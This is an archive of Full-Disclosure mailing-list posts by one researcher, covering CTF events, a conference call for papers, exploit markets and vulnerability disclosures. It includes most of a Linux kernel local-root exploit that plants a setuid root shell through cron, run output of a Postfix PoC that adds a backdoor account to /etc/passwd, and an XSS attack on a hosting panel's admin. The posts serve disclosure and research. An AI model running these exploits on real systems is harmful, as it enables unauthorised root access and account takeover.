Re: [Full-disclosure] Amongst data breaches and misc 'leakage', not necessarily digital, DEFCON CTF continues at DEFCON XX

2012-04-13 Thread Roman Medina-Heigl Hernandez
Since years, I'm actively participating in CTFs (mostly playing but also
organizing some of them) and I'm member of a well-known CTF team... So let
me throw some constructive words about CTFs in general and Defcon's in
particular. Inline response/comments following:

Vulcan DDtek escribió:
> DT asked DDT to grow the CTF.  So we have.  We are pre-qualifying
> winners of other CTFs around the globe to bring a smackdown of epic
> proportions this August.
> As always, last year's champion, the Euopean Nopsled Team, is granted
> automatic entry.  There are so many CTFs on the
> circuit these days, we seek to incorporate only the best of the best.

If so, why are you running quals almost exactly when Phdays CTF final is
being held? Many teams will be flying back home on Sunday (Jun, 3th).
Impossible to join Defcon quals (apart from the fact that two consecutives
CTFs is too much time-consuming and effort).

Summarizing, you're going to miss really good teams like:

> Last year the iCTF and Codegate winners demonstrated that winners of
> these CTFs were worthy of returning, additionally we invite victors
> from NCCDC, HitB, PhDays, nuit du hack, ruCTF, and Defcon 19 oCTF.

Again, if you're considering PhDays as a good CTF event, it makes no sense
to "intersect" with them.

> While DEFCON refuses to sell-out to corporate sponsorship, DT is
> personally covering two rooms per team at the majestic RIO hotel
> Thursday-Sunday for each team.

It's better than nothing but not enough (IMHO). Please, learn from other
"big" CTF events like Codegate. Only the flight for a non-US citizen could
be 1000 EUR. If "the player" must cover flight, accomodation and even
Defcon entrance (omg, this is hilarious!), then what are the benefits/pros
of competing at Defcon CTF? Only "fame", I guess (because there are no
prizes either). A very expensive fame, I'd add (again, IMHO) :)

> In honor of DC XX we're upping the number of tables in Vegas to 20
> total.  Yes, when the dust clears the _20_ best will be invited to

It's going to be the Jungle :) Hope there's no network or scoring problems
like other years... Btw, IMHO, scores should be up and visible for all
(public) during *all* the game in order to have some minimal guarantee of
fair game.

Another point: is it fair some teams have literally a troop of players
"helping" from their room/internet, etc at Defcon final? I agree it's
difficult to limit cheating but at least some basic rules should try to
guard against it.

I wish luck for all of you (organizers and players) :)

PS: Sorry for the rant, my intention was/is to be constructive and that
CTFs become better (not only Defcon's; learning from others' errors is
good/desirable so if you -CTF organizer in general- understood this email,
I'm sure you'll know how to improve your CTF organization).

PS2: I also got no response from Ddtek when trying to deal with some of
these issues. I suppose they're quite busy designing this year's VM to be
rooted again (recursive issue? :)) }:-)


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Re: [Full-disclosure] Advisory: sudo 1.8 Format String Vulnerability

2012-02-06 Thread Roman Medina-Heigl Hernandez
Folks at @vupen seems to have it exploited the hard way.

"We successfully exploited the recent Sudo local root / format string vuln
including full bypass of FORTIFY_SOURCE #GotRoot"



joernchen of Phenoelit escribió:
> Hi,
> On 01/31/2012 05:14 PM, Todd C. Miller wrote:
>> joernchen is correct, it is probably still possible to exploit with
>> -D_FORTIFY_SOURCE=2, though it is more difficult.  On systems with
>> ASLR and a non-executable stack it should be even harder.
> nasty thing is: it's a local exploit so you got nearly unlimited tries
> for free =). It will just be noisy in dmesg due to all the segfaults
> while brute forcing the right values.
> cheers,
> joernchen

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[Full-disclosure] "SbD Wargame 2011 write-up" by int3pids

2011-02-08 Thread Roman Medina-Heigl Hernandez

For those interested in CTFs, wargames, etc... This is the complete
walkthrough to one of them: the Spanish SbD wargame held ~1 month ago.
Written by the winning team: int3pids.


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Re: [Full-disclosure] Web challenges from RootedCON'2010 CTF - Contest -> Solutions and Write-ups

2010-10-26 Thread Roman Medina-Heigl Hernandez
Contest is over. PPP (Plaid Parliament of Pwning) won the prize.

Write-ups (3 in English and 1 in Spanish) were packed in this .rar file:
(see "readme" file with complete info and press-release).

Thanks to all who played with us :)

PD: Again, this has nothing to do with current RootedCON congress/organization.


Roman Medina-Heigl Hernandez escribió:
> Hello,
> Next Friday I will be running a web-based challenges contest. Winner will
> be awarded with the new iPod touch from Apple. Thanks to Hispasec Sistemas
> (you probably know them as the makers of VirusTotal service) from
> sponsoring the prize.
> Full info (registration currently open):
> PS: Contest is a *personal initiative*. The current RootedCON organization
> is NOT involved at all. Chosen name is merely anecdotal.

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[Full-disclosure] Web challenges from RootedCON'2010 CTF - Contest

2010-09-13 Thread Roman Medina-Heigl Hernandez

Next Friday I will be running a web-based challenges contest. Winner will
be awarded with the new iPod touch from Apple. Thanks to Hispasec Sistemas
(you probably know them as the makers of VirusTotal service) from
sponsoring the prize.

Full info (registration currently open):



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[Full-disclosure] Rooted CON 2010 - CFP

2009-10-01 Thread Roman Medina-Heigl Hernandez

  - Rooted CON 2010 -
 C A L L   F O R   P A P E R S

.: [ ABOUT ]

  Rooted CON is a Security Congress to be held in Madrid (Spain) on
March 2010. Our goal is to promote security by offering highly technical
talks with a practical approach (interesant mix of theory / demos) and
neutrality (although we want businesses/enterprises to participate in the
congress, they should prioritize the technical and objective approach).

  We also want people to participate and enjoy... And even come back home
with a prize! Therefore, we will hold various events (apart from talks),
one of the most important of them being the CTF ("Capture the flag")
contest, with substantial cash prizes and been designed by none other
than one of the "Sexy Pandas" (finalist team in the traditional "Defcon"

  And of course if you are brave enough you will also have fun by living
the beautiful nights of Madrid...

.: [ FORMAT ]

  We would like to receive two kind of proposals:
- fast talks. Duration: 20'.
- normal talks. Duration: 50'.

  If you have a crazy/interesting and fresh idea that could be summarized
in fewer time, please don't hesitate and submit a fast talk. If your idea
is even crazier and need more time to be explained in depth, use the
second one: normal talk.

  We are only accepting submissions in Spanish and English language. We
will do our best to have simultaneous translation in the conference room
but we cannot promise it since it will depend on budget and sponsors.

.: [ TOPICS ]

  Every hot topic in the security market is welcome. These are only some

- innovative defensive and offensive techniques.
- everything related to fraud, phishing, trojan horses in financial
entities, protection mechanisms and technologies...
- "reversing", low-level techniques, kernel, ...
- vulnerabilities discovery, "fuzzing" and related topics.
- virtual contexts attacks, clusters, "cloud computing" and new "in the
cloud" products.
- cryptography and cryptanalysis.
- mobile security.
- hacking tools: custom developments.
- document security.
- VoIP, phreaking, ...
- forensics / antiforensics.
- wireless security.
- steganography and covert channels.
- web applications security
- ...


  Would you like to speak at Rooted CON? Please, don't forget to make
talks illustrative and include demos! :)

  Please, send your application via e-mail to:
cfp -AT-

  For the talk to be accepted in the initial selection process it should
comply with the previously described format and *must* include *all* the
following info:

- title
- author (full name and optionally nick/handle)
- bio (some lines defining who you are)
- duration (normal or fast talk?)
- abstract (should be sufficiently extensive for being correctly
- location/nationality
- facilities needed
- do you plan to present same or similar talk in another conference?
Which one?


October 1, 2009 - CFP opens.
December 20, 2009 - CFP closes.
December 31, 2009 - Speakers selected.
January 10, 2010 - Final paper and presentation material submitted.


  Speakers will be given the following benefits:
- Free accommodation.
- Free access to the conference.
- Travel expenses (if possible).
- Free party tickets/drinks.


  There are still opportunities to help us in organizing the best security
congress in Spain while obtaining an interesting marketing ROI. If you are
interested in being one of our sponsors, please, contact us at:

sponsors -AT-

.: [ LINKS ]

- Web site
- Facebook group
- LinkedIn group
- Announce mailing-list


Rooted CON staff

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[Full-disclosure] PoCfix (PoC for Postfix local root vuln - CVE-2008-2936)

2008-08-31 Thread Roman Medina-Heigl Hernandez
Hash: SHA1


The recent vulnerability in Postfix discovered by Sebastian Krahmer is
trivially exploitable when certain preconditions are met. Nevertheless,
it's very difficult to find such conditions in a real-world scenario. I
wrote this exploit for fun and to demonstrate that. I also hope it helps
sysadmins to check and test their systems.

I used an Ubuntu/Debian (IA32) system which *I had to make vulnerable on
purpose*. The tweaks were:
- - #1: make the spool writable to attacker
chmod o+w /var/mail
- - #2: disable mail aliases (LDA should be able to deliver mail directly to
"root" mailbox)
- - #3: use "local" postfix process as LDA

Perhaps condition #1 is the most difficult to meet, for a normal
(non-privileged) user. But think about a privilege escalation if you manage
to get into the "mail" group first (spool dir is tipically writable by
members of "mail" group).

For #2, it depends on configuration, but Ubuntu/Debian usually creates an
alias for "root", so that mail is delivered to a non-root account (and
making the system non vulnerable to this exploit).

When installing Postfix, you are asked to choose a local delivery agent
(LDA). I found one of my test systems using procmail (not vulnerable) and
another one using postfix built-in LDA (vulnerable).

For a quick test, normally, it will be sufficient to append the following
lines to /etc/postfix/
alias_maps =
mailbox_command =
(left blank intentionally)

Finally, postfix should be refreshed:
postfix reload

There are other preconditions like:
- - #4: postfix should not be using maildir-style mailboxes
- - #5: mailbox for "root" should not exist (or at least you should have
permission to delete it, which is not always possible, even when #1 is true)

My script tries to do its best to check for these conditions (postfix
config is very flexible, I only checked some typical parameters). Feel free
to write me for corrections, etc.


[EMAIL PROTECTED]:~$ chmod a+x
# "" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <[EMAIL PROTECTED]>
# Tested: Ubuntu / Debian
# [ Madrid, 30.Aug.2008 ]
[*] Postfix seems to be installed
[*] Hardlink to symlink not dereferenced
[*] Spool dir is writable
[*] Backed up: /etc/passwd (saved as "/tmp/pocfix_target_backup.18107")
[*] Sending mail (3 seconds wait)
[*] Exploit successful (appended data to /etc/passwd). Now "su dsr", pass
is "dsrrocks")


PS: I didn't find Wietse's nice advisory [1] on site (or at
least, if it exists, it's not easy to find it). Although it seems that some
non-POSIX issues in OS are contributing to the vulnerability, IMHO it's a
(low-medium risk) vulnerability in Postfix and it deserves to be listed on
postfix page. Despite this issue, Postfix continues being one of the best
mail server software ever made and my favourite MTA.


- --

- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
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Description: application/shellscript
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Re: [Full-disclosure] AppScan and IDS evasion

2008-05-24 Thread Roman Medina-Heigl Hernandez
Pen Testing escribió:

> I've launched AppScan against a web application and I'm being
> blocked/banned (since I have a dynamic IP I can reboot my router and
> get another IP, which is shortly banned again, as long as the attack
> persists). Since AppScan doesn't have any kind of IDS evasion (AFAIK),
> what could I do?

Are you using the default template/policy? Perhaps you could edit it and/or 
create a new (and more relaxed) one by disabling potentially detectable 
checks... No idea about which checks you should eliminate...

> PS: I don't know which kind of IDS is in use (perhaps it's not a
> full-IDS but some anomaly detection as the one included in Checkpoint
> FW-1 but I don't have that information).

Any of you have more info about the kind of checks FW1 use?



PGP Fingerprint:
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[Key ID: 0xEAD56742. Available at KeyServ]

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[Full-disclosure] Conferences material, etc

2007-11-04 Thread Roman Medina-Heigl Hernandez
Hello ppl,

Could somebody provide a good link (ftp mirror) containing past
presentations&videos of known security conferences? (defcon, ccc, etc).
Some kind of sorted archive would help :)

I used "" in the past but it seems not to exist now...



PGP Fingerprint:
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[Full-disclosure] DoS Exploit for DHCPd bug (Bugtraq ID 25984 ; CVE-2007-5365)

2007-11-02 Thread Roman Medina-Heigl Hernandez
Hash: SHA1


I've been playing with DHCPd bug in *Ubuntu Linux*. According to the
analysis by Core it could be theoretically possible to get a shell ("the
possibility of using it to execute arbitrary code on vulnerable systems was
not investigated in-depth and should not be disregarded"):

But in practice it doesn't seems to be possible because vulnerable memcpy
tries to write past the end of the stack region (it tries to write ~64
kbytes, when available stack space is ~8 kbytes), so you always get an
instant "Segmentation fault", without any chance to control EIP.

DoS exploit is quite trivial. DHCPd crashes using mms values:
278 <= mms <= 284
I've attached working (DoS) exploit.

If some code-ninja has any idea about how to overcome the former
exploitation problem, please, I'd  be interested in knowing it (perhaps
performing a previous DHCP operation in order for the stack to be expanded,
before launching the real exploit?).

- --

- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

Version: GnuPG v1.4.7 (MingW32)


Description: Binary data
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Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Roman Medina-Heigl Hernandez
Then you cannot assure that your buyer will make an ethical use of the
exploit. So what's the real difference against selling it to another people
(known or "unknown", where "unknown" could be black-hats, script-kiddies or
whoever making the higher bid)? The receipt? :) I mean, if I (as a
researcher) don't mind what the exploit will be used for, I'd simply look
for the higher bidder (I guess).

And you didn't really answer my former two questions... Please, could you
provide some specific examples of typical ways to justify ROI? Which is the
typical profile/s of enterprise/s buying exploits? (without naming
particular enterprises, of course).

Simon Smith escribió:
> Oh, 
> About your ROI question, that varies per buyer. I am not usually told
> about why a buyer needs something as that's none of my business.
> On 1/18/07 4:22 AM, "Roman Medina-Heigl Hernandez" <[EMAIL PROTECTED]>
> wrote:
>> Simon Smith escribió:
>>> Amen!
>>> KF is 100% on the money. I can arrange the legitimate purchase of most
>>> working exploits for significantly more money than iDefense, In some cases
>>> over $75,000.00 per purchase. The company that I am working with has a
>>> relationship with a legitimate buyer, all transactions are legal. If you're
>> I was wondering which kind of (legal) enterprises/organizations would pay
>> $75000 for a simple (or not so simple) exploit.
>> - governmental organizations (defense? DoD? FBI? ...)
>> - firms offering high-profiled pen-testing services?
>> - ... ?
>> What about the ROI for such investment?
>> Regards,
>> -Roman
>> ___
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>> Charter:
>> Hosted and sponsored by Secunia -



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[Key ID: 0xEAD56742. Available at KeyServ]

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Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE

2007-01-18 Thread Roman Medina-Heigl Hernandez
Simon Smith escribió:
> Amen!
> KF is 100% on the money. I can arrange the legitimate purchase of most
> working exploits for significantly more money than iDefense, In some cases
> over $75,000.00 per purchase. The company that I am working with has a
> relationship with a legitimate buyer, all transactions are legal. If you're

I was wondering which kind of (legal) enterprises/organizations would pay
$75000 for a simple (or not so simple) exploit.
- governmental organizations (defense? DoD? FBI? ...)
- firms offering high-profiled pen-testing services?
- ... ?

What about the ROI for such investment?


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[Full-disclosure] HP Tru64 dtmail bug - Really exploitable?

2006-10-22 Thread Roman Medina-Heigl Hernandez
nced before the function returns (which is common with most of
> the CDE bugs). The 64 bit pointer is of course 8 bytes of the string you
> use to smash the buffer, and it requires some NULL bytes which is not
> possible given the architecture. I was a little unclear about this
> (actually, completely wrong) but am still fairly confident this bug
> isn't actually exploitable on TRU64.
> On 10/20/06, *Roman Medina-Heigl Hernandez* <[EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]>> wrote:
>> Correction, TRU64 runs on Alphas in LSB mode. However, this bug is
> still
>> not exploitable. Sorry for the NETRAGARD-like fuckup :D
> I didn't have time enough to test this, but at first sight it seems
> perfectly exploitable.
> Alpha is a "true" 64 bits RISC processor (both data & addressing
> being 64
> bits), little-endian. A typical stack address is something like:
> 0x1530 ( "\x30\xf5\xff\x1f\x01\x00\x00\x00" )
> So yes, you have nulls (3, in this case), but at the end of the
> string :-)
> You can try a typical string-alike buffer:
> (stack variables are just before RET, you have not saved frame pointer
> stored here)
> Assuming a typical RET value (like the former one), your exploit should
> rely on memory being "more or less clean", I mean, at least two
> nulls (the
> third one is \0 terminator byte, you can insert it) should be exist
> in the
> memory location where the attack string is being copied (well, at
> the end
> of the string). Is this difficult? I don't think so (but I don't really
> know for sure).
> You can minimize the problem if you use longer RET addreses. For
> instance,
> a typical address inside libc functions could be: 0x3ff800f3810 (so you
> have two nulls, instead of three). You'd have to deal with only one
> residual null value, instead of two. You can try this with a typical
> return
> into libc exploit. This should be also sufficient (and useful) to avoid
> non-executable stack protection, which is enabled by default in Tru64.
> Well, that's the theory... :-)

- --

- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
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Version: GnuPG v1.4.2.2 (MingW32)


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Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ ]

2006-10-20 Thread Roman Medina-Heigl Hernandez
Hash: SHA1

> Correction, TRU64 runs on Alphas in LSB mode. However, this bug is still
> not exploitable. Sorry for the NETRAGARD-like fuckup :D

I didn't have time enough to test this, but at first sight it seems
perfectly exploitable.

Alpha is a "true" 64 bits RISC processor (both data & addressing being 64
bits), little-endian. A typical stack address is something like:
0x1530 ( "\x30\xf5\xff\x1f\x01\x00\x00\x00" )

So yes, you have nulls (3, in this case), but at the end of the string :-)
You can try a typical string-alike buffer:
(stack variables are just before RET, you have not saved frame pointer
stored here)

Assuming a typical RET value (like the former one), your exploit should
rely on memory being "more or less clean", I mean, at least two nulls (the
third one is \0 terminator byte, you can insert it) should be exist in the
memory location where the attack string is being copied (well, at the end
of the string). Is this difficult? I don't think so (but I don't really
know for sure).

You can minimize the problem if you use longer RET addreses. For instance,
a typical address inside libc functions could be: 0x3ff800f3810 (so you
have two nulls, instead of three). You'd have to deal with only one
residual null value, instead of two. You can try this with a typical return
into libc exploit. This should be also sufficient (and useful) to avoid
non-executable stack protection, which is enabled by default in Tru64.

Well, that's the theory... :-)

- --

- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Version: GnuPG v1.4.2.2 (MingW32)


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Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ ]

2006-10-20 Thread Roman Medina-Heigl Hernandez
Hash: SHA1

Roman Medina-Heigl Hernandez escribió:
>>> Product Name: dtmail
>>> Product Version : 5.1b
>>> Vendor Name : Hewlet Packard
>>> Criticality : Local Root Compromise
>>> Effort  : Easy
>>> Operating System: Tru64
>>> Type: Unchecked Buffer
> Hello,
> I've just installed vulnerable package in my test-bed:
> # uname -a
> OSF1 alpha V5.1 2650 alpha
> # pwd
> # setld -l . OSFCDEMAIL540
> # ls -l /usr/dt/bin/dtmail
> -r-xr-sr-x   1 bin  mail 1212752 Oct 17  2002 /usr/dt/bin/dtmail
> #
> How is this a local root? (binary is setgid "mail" but not setuid "root")

Confirmed by HP: *NOT* a local root.

"The vulnerability could be exploited by a local, authorized user to
execute arbitrary code as a member of the 'mail' group."

Interesting enough to note that the bug is also present in HPUX (same
scope, again not a local root).

Netragard ppl should fix their advisory and web site...

- --

- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Version: GnuPG v1.4.2.2 (MingW32)


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Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ ]

2006-10-17 Thread Roman Medina-Heigl Hernandez
Hash: SHA1

> Product Name  : dtmail
> Product Version   : 5.1b
> Vendor Name   : Hewlet Packard
> Criticality   : Local Root Compromise
> Effort: Easy
> Operating System  : Tru64
> Type  : Unchecked Buffer


I've just installed vulnerable package in my test-bed:

# uname -a
OSF1 alpha V5.1 2650 alpha
# pwd
# setld -l . OSFCDEMAIL540
# ls -l /usr/dt/bin/dtmail
- -r-xr-sr-x   1 bin  mail 1212752 Oct 17  2002 /usr/dt/bin/dtmail

How is this a local root? (binary is setgid "mail" but not setuid "root")

- --

- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Version: GnuPG v1.4.2.2 (MingW32)


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[Full-disclosure] Portable shell-exploit for buffer-overflow bugs

2006-09-29 Thread Roman Medina-Heigl Hernandez
Hello str0ke,

I reviewed the exploits listed. Yes, all of them use the shell but they
exploit trivially shell-exploitable bugs (like race conditions, ld-preload,
etc) or include other "external" programs (like cc, perl, etc) or assume
Linux/bash as well as other more or less recent environments.

The nearest exploit to what I was looking for (buffer overflow exploit in
shell-scripting) is:

But it lacks compatibility. For instance, "echo" command is very variable,
depending on OS/Shell version. I've uploaded a proof of concept which I
wrote some time ago, showing my approach, to:
(~6 KB)

It may not be perfect but my goal was to make it work in a very old minimal
Unix environment (the exploit yields local root on AIX, abusing a
known and ancient bug: ~ 10 years old!) and at the same time compatible
with some recent systems like Linux/bash (logically, the vulnerability is
not present in such systems, I'm referring to the skel of the exploit).

Feedback would be appreciated.

PS: I'm cc'ing some lists where this post could suit. Moderators should decide.


str0ke escribió:
> How goes it Roman,
>> Which other "curious" exploits in shell do you know of?
> Attached is a list of the known exploits that are in shell, some call
> other languages some don't.
> Be safe,
> /str0ke
> date  exploit title   
> exploit author
>   platform
> 2003-04-23Snort <=1.9.1 Remote Root Exploit (   
>  truff 
>   linux
> 2003-05-02OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (
>  Nicolas Couture   
>   linux
> 2003-07-22Cisco IOS (using hping) Remote Denial of Service Exploit
>  zerash
>   hardware
> 2004-01-25MS Windows XP/2003 Samba Share Resource Exhaustion Exploit  
> Steve Ladjabi 
>   windows
> 2000-11-16/sbin/restore exploit (rh6.2)   
> n/a   
>   linux
> 2000-11-17Slackware Linux /usr/bin/ppp-off Insecure /tmp Call Exploit 
> sinfony   
>   linux
> 2000-11-19dump 0.4b15 Local Root Exploit  
> Mat   
>   linux
> 2000-11-19HP-UX 11.00/10.20 crontab Overwrite Files Exploit   
> dubhe 
>   hp-ux
> 2000-11-21vixie-cron Local Root Exploit   
> Michal Zalewski   
>   linux
> 2000-12-15Pine (Local Message Grabber) Exploit
> Mat   
>   linux
> 2001-01-02Redhat 6.1 / 6.2 TTY Flood Users Exploit
> teleh0r   
>   linux
> 2001-01-03Solaris 2.6 / 7 / 8 Lock Users Out of mailx Exploit 
> optyx 
>   solaris
> 2001-01-25glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x  
> krochos   
>   linux
> 2001-05-07IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/bin/lpstat Local Exploit 
>   irix
> 2001-05-08IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local 
> Exploit LSD-PLaNET
>   irix
> 2001-03-04GLIBC 2.1.3 ld_preload Local Exploit
> shadow
>   linux
> 1997-05-03Solaris 2.5.1 lp and lpsched Symlink Vulnerabilities
> Chris Sheldon 
>   solaris
> 1997-05-19Solaris 2.5.0/2.5.1 ps & chkey Data Buffer Exploit  
> Joe Zbiciak   
>   solaris
> 2004-07-22Xitami Web Server Denial of Service Exp

Re: [Full-disclosure] Online code and decode webpage

2006-07-20 Thread Roman Medina-Heigl Hernandez
Alice Bryson escribió:
> hi there
> provide free online code and decode service
> website, including base64, hashes, cipher analyze and etc.

Which is your preferred/most complete *Windows* toolkit for performing a
similar task? Ideally a simple .exe including a GUI and featuring different
encoding/decoding (uuencode, base64, urlencode, etc) mechanisms, hashes
(MD4, MD5, SHA1, etc), encryption algorithms. Any all-in-one for this?



PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

[Full-disclosure] Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t Exploit ( BID 18874 / CVE-2006-2451 )

2006-07-11 Thread Roman Medina-Heigl Hernandez
Hash: SHA1

Maybe this is obvious for Paul Starzetz (as well as many other people) but
full-disclosure is not really "full" without exploit code.

Working exploit attached. You can also download it from:

Greetz to !dSR ppl :-)

- --

- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Version: GnuPG v1.4.2.2 (MingW32)

/* Local r00t Exploit for:   */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x  (>= 2.6.13 && <   */
/* By:   */
/* - dreyer<[EMAIL PROTECTED]>   (main PoC code)   */
/* - RoMaNSoFt <[EMAIL PROTECTED]> (local root code) */
/*  [ 10.Jul.2006 ]  */


 * * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh 
; rm -f /etc/cron.d/core\n";

int main() { 
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");

corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);

printf("[*] Creating Cron entry\n");

if ( !( child = fork() )) {
prctl(PR_SET_DUMPABLE, 2);

kill(child, SIGSEGV);

printf("[*] Sleeping for aprox. one minute (** please wait **)\n");

printf("[*] Running shell (remember to remove /tmp/sh when finished) 
system("/tmp/sh -i");

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Re: [Full-disclosure] How secure is software X?

2006-05-13 Thread Roman Medina-Heigl Hernandez
Lucien Fransman wrote:

> I often wondered about this. An assessment is only as good as the assesser. 
> What is the use of a "i can break and exploit $foo application, and have 
> shown this in my tests", if it is done by a private exploit? Again, i'm 


> It only shows that the application has a bug, that is known to you or your 
> company. Will it benefit the company that is being tested? I am not so sure 
> about this. What would a company do with this kind of information? Fix the 
> bug? They can't because they dont have access to the source.  Will it entice 
> the vendor to fix the vulnerability? No, as they dont know it exists.

It shows that the company's security could/should be improved. Security
must follow a layered approach. Perhaps you cannot fix the real problem
(i.e. the bug) but you can avoid it to be exploited/abused. For
instance, the pentester *probably* couldn't have exploited that 0-day
overflow in that Linux critical server if it had Grsec running on. Or
the pentester couldn't have exploited that 0-day SQL injection bug if
Apache had been configured with some kind of application firewall
(ModSecurity, etc). Or this hacked-by-0day server couldn't have been
even accessed if the network were propperly segmented/firewalled. Or my
IDS noticed the 0day exploitation (not very sure of this }:-)). Or I
couldn't avoid the compromise but I had it logged to my syslog
bullet-proof server. Or... 

If I were a company, I'd like to know that I survived to 0day exploit
attempts or at least I detected them. It's an important added value for me.



PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

[Full-disclosure] PHP and SCRIPT_NAME variable

2006-02-20 Thread Roman Medina-Heigl Hernandez

Last week I was thinking about the possibility for an external attacker to
influence over the following PHP variable:

The former variable contains the remote path (URI) to a PHP script, so if
for instance you access with a browser to:
Then SCRIPT_NAME will contain "/aa/bb/cc/script.php"

I did some basic tests with PHP 4.3.10 and the implementation seems to be safe:
- For instance, if you access something like:
Then SCRIPT_NAME will be "/aa/dd/cc/script.php"
instead of "/aa/bb/../dd/cc/script.php"
- If you try:
Then SCRIPT_NAME will contain "/aa/bb/cc/script.php"

My goal is to be able to add some attacker-specified string to the
variable. Two questions:
1) Do you know of any trick/method by which an attacker could alter
SCRIPT_NAME variable? (obviusly without having access to docroot directory
and/or edit httpd.conf)
2) Perhaps older PHP versions didn't sanitize SCRIPT_NAME variable
correctly and could be abused? Any idea?


Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

[Full-disclosure] RS-2006-1: Multiple flaws in VHCS 2.x

2006-02-11 Thread Roman Medina-Heigl Hernandez
Hash: SHA1

   - RS-Labs Security Advisory -

  Tittle:   Multiple flaws in VHCS 2.x
  ID:   RS-2006-1
Severity:   Critical
Date:   11.Feb.2006
  Author:   Román Medina-Heigl Hernández (a.k.a. RoMaNSoFt) <[EMAIL PROTECTED]>

.: [ SUMMARY ]

  With about 100.000 installs, VHCS (Virtual Hosting Control System) [1] is
perhaps the best known professional control panel software being open source
and an excelent choice for shared, reseller, virtual and dedicated server

  VHCS team recently released a security patch (dated on Feb, 5th). As I was
evaluating that software (mainly from a functional perspective) and I care
about security I decided to download it and have a look at it. Soon I realized
that the patch was flawed: it was indeed adding a big XSS [5] security hole (by
removing specific XSS protection which existed in latest VHCS version - I reported the problem to Alexander Kotov (VHCS project leader,
hereinafter will be referred as "the vendor"), with cc to Full-Disclosure
mailing-list [2]. This is bug #1 and we will mark the related security patch
as "v.1". As a bonus, I also reported another bug: #2.

  The vendor issued a new security patch (a.k.a. "v.2"), correcting the XSS
problems, and refused to explain what the real bug supposedly being fixed was,
either publicly neither privately. Moreover, they didn't inform its own users
of the problems with security patch v.1 and indeed they simply replaced the
old patch (v.1) with the new one (v.2), without changing filename nor issuing
any kind of warning. I'm differentiating them here by adding the "v.#" suffix.

  I quickly researched the new patch. It only introduced one line of code into
check_login() function. I found a critical bug being partially fixed here.
Let's name it as bug #3. I also noticed the same function continued being
buggy (before or after applying patch v.2) and while testing former bugs I
discovered a new bug (#4). Finally vendor issued a third patch (dated on Feb,
9th), let's call it v.3. It corrected bug #3 but not #4 (which is 0day at the
time of writing this advisory).

.: [ BUG #1 ]

Severity:   High
Affected: + patch v.1, (and lower)
Fixed: (optionally plus: patch v.2 or patch v.3)
Summary:"Admin Log" XSS

  VHCS has three different access level interfaces: administrator, reseller
and domain user. The administrator interface is the more powerful and permits
full control over the system. One of the tasks of a VHCS administrator is
reviewing logs and this functionality is integrated on the admin interface.
You can reach it by logging with an admin account and then clicking: System
Tools -> Admin log. This dynamic page (and the rest of the GUI) is written in
PHP. Basically, what it will do is to read logs from MySQL database (in parti-
cular, table "log" from "vhcs2" database, by default), perform some kind of
simple parsing (for instance, adding bold style to certain special words) and
finally print them to the GUI.

  VHCS registers several events in logs, including bad login attempts. In this
case, a simple entry like this is generated: "john bad password login data".
As you probably noted, "john" is the username trying to log in. The problem is
that VHCS takes this username directly from the login page, without any fil-
tering. So some evil attacker could enter whatever he/she wants -including
HTML and/or JavaScript code- as username and it will be logged. Next time when
the VHCS administrator reviews logs using GUI's "Admin log" page, that code
will be executed in the context of VHCS Admin GUI. This is doubly dangerous:
the attacker owns victim's browser (which could be used as a new attack vector
to other known vulnerabilities such as Windows' WMF bug, Internet Explorer or
Firefox vulns, etc) and he/she also owns VHCS GUI with admin privileges.

  For instance, you can exploit this bug by entering the following string as
the username in VHCS login page:


  When the administrator reviews the logs, his/her password will be automati-
cally changed to "hackme".

.: [ BUG #2 ]

Severity:   Low
Affected:   All versions (tested on: w/ or wo/ any patch,
Fixed:  None
